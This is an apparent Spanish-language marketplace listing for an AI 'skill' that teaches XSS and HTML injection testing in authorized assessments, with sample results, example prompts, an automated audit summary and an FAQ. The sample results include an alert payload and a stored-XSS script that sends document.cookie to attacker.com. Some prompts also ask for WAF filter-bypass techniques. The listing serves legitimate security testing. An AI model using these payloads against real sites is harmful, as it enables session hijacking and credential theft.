Habilidades xss-html-injection
📦

xss-html-injection

Seguro ⚡ Contiene scripts⚙️ Comandos externos🌐 Acceso a red📁 Acceso al sistema de archivos

Prueba de vulnerabilidades XSS e inyección HTML

Las aplicaciones web frecuentemente contienen fallas de cross-site scripting e inyección HTML que los atacantes explotan para robar sesiones y credenciales. Esta skill proporciona una metodología sistemática para detectar, explotar y validar vulnerabilidades de inyección del lado del cliente en evaluaciones de seguridad autorizadas.

Soporta: Claude Codex Code(CC)
📊 69 Adecuado
1

Descargar el ZIP de la skill

2

Subir en Claude

Ve a Configuración → Capacidades → Skills → Subir skill

3

Activa y empieza a usar

Pruébalo

Usando "xss-html-injection". Test the search parameter for reflected XSS

Resultado esperado:

  • Vulnerability Found: Reflected XSS in /search?q= parameter
  • Severity: Medium
  • Payload: <img src=x onerror=alert(document.domain)>
  • Context: HTML body - unencoded reflection
  • Recommendation: Implement output encoding for all user input

Usando "xss-html-injection". Test user profile bio field for stored XSS

Resultado esperado:

  • Vulnerability Found: Stored XSS in user profile bio
  • Severity: High (persistent, affects all users)
  • Payload: <script>fetch('https://attacker.com/log?c='+document.cookie)</script>
  • Impact: Session hijacking for all users viewing profile
  • Recommendation: Implement strict input validation and output encoding

Auditoría de seguridad

Seguro
v1 • 2/25/2026

This is a legitimate security testing skill for XSS and HTML injection vulnerability assessment. All 121 static findings are FALSE POSITIVES - they represent educational examples of vulnerable code patterns (eval, innerHTML, document.write) and demonstration payloads using example URLs (attacker.com). The skill teaches security professionals how to identify and test for client-side injection vulnerabilities in authorized penetration tests.

1
Archivos escaneados
505
Líneas analizadas
5
hallazgos
1
Auditorías totales
Problemas de riesgo bajo (1)
Educational Security Testing Content - False Positives
All 121 static findings are FALSE POSITIVES. The skill contains: (1) Examples of vulnerable code patterns (eval, innerHTML, document.write at lines 190,194,195,198,319,328,467) - teaching testers to identify these sinks; (2) Demonstration payloads using example URLs (attacker.com) - standard practice in security documentation; (3) References to keylogger and credential access as attack vectors - essential knowledge for defenders. This is legitimate educational content for authorized penetration testing.

Factores de riesgo

⚡ Contiene scripts (7)
⚙️ Comandos externos (64)
🌐 Acceso a red (27)
📁 Acceso al sistema de archivos (1)

Patrones detectados

Pattern: eval() in Code ExamplesPattern: document.write and innerHTML in ExamplesPattern: Network Requests in Payloads
Auditado por: claude

Puntuación de calidad

38
Arquitectura
100
Mantenibilidad
87
Contenido
21
Comunidad
100
Seguridad
87
Cumplimiento de la especificación

Lo que puedes crear

Consultor de Seguridad Probando Aplicaciones Web

Realizar pruebas de penetración autorizadas para identificar vulnerabilidades XSS en aplicaciones web de clientes y proporcionar recomendaciones de remediación.

Desarrollador Validando Manejo de Entradas

Probar aplicaciones web personalizadas durante el desarrollo para verificar que se implementa el sanitizado de entrada y codificación de salida adecuados.

Ingeniero QA Realizando Regresión de Seguridad

Incluir pruebas de XSS e inyección HTML en suites de pruebas de regresión de seguridad para detectar vulnerabilidades antes del despliegue a producción.

Prueba estos prompts

Detección Básica de XSS
Use the XSS HTML injection skill to test the login form at https://example.com for reflected XSS vulnerabilities. Identify all input fields and test for basic XSS payloads.
Evaluación de XSS Almacenado
Use the XSS HTML injection skill to test the comment section for stored XSS. Create test payloads that persist and execute when other users view the content.
Descubrimiento de XSS Basado en DOM
Use the XSS HTML injection skill to analyze the JavaScript on https://example.com/dashboard for DOM-based XSS. Check location.hash and location.search handling.
Validación de Evasión de Filtros
Use the XSS HTML injection skill to test if the WAF at https://example.com blocks common XSS payloads. Try HTML encoding, Unicode encoding, and tag variation bypass techniques.

Mejores prácticas

  • Siempre obtener autorización escrita antes de probar cualquier aplicación objetivo
  • Usar payloads de demostración controlados que no persisten ni se propagan a usuarios no intencionados
  • Reportar vulnerabilidades críticas inmediatamente a través de los canales de respuesta a incidentes correspondientes

Evitar

  • Probar sistemas de producción sin autorización escrita explícita
  • Usar vulnerabilidades descubiertas para acceso no autorizado o exfiltración de datos
  • Desplegar payloads que podrían causar denegación de servicio o daño al sistema

Preguntas frecuentes

¿Esta skill realiza ataques reales a sitios web objetivo?
No. Esta skill proporciona metodología y payloads para pruebas de seguridad autorizadas. Los usuarios deben tener permiso escrito explícito antes de probar cualquier sistema.
¿Puede esta skill probar todos los tipos de XSS?
La skill cubre XSS almacenado, reflejar y basado en DOM. Sin embargo, algunas variantes avanzadas como mutation XSS pueden requerir técnicas especializadas adicionales.
¿Qué autorización se requiere antes de usar esta skill?
Se requiere autorización escrita del propietario del sistema. Esto debe incluir el alcance definido, métodos de prueba permitidos y procedimientos de manejo para cualquier dato capturado.
¿Esta skill funciona contra aplicaciones con CSP?
CSP puede bloquear muchos payloads XSS. La skill incluye técnicas para probar evasión de CSP, pero algunas políticas CSP bien configuradas pueden prevenir la explotación exitosa.
¿Siempre se pueden robar cookies de sesión mediante XSS?
No. Las cookies marcadas con HttpOnly no pueden ser accedidas vía JavaScript. Las aplicaciones modernas deben usar esta protección para cookies de sesión.
¿Qué debo hacer si encuentro una vulnerabilidad XSS crítica?
Reportar inmediatamente a través de los canales correspondientes según el acuerdo de autorización. Documentar el hallazgo con prueba de concepto y proporcionar recomendaciones de remediación al propietario.

Detalles del desarrollador

Estructura de archivos

📄 SKILL.md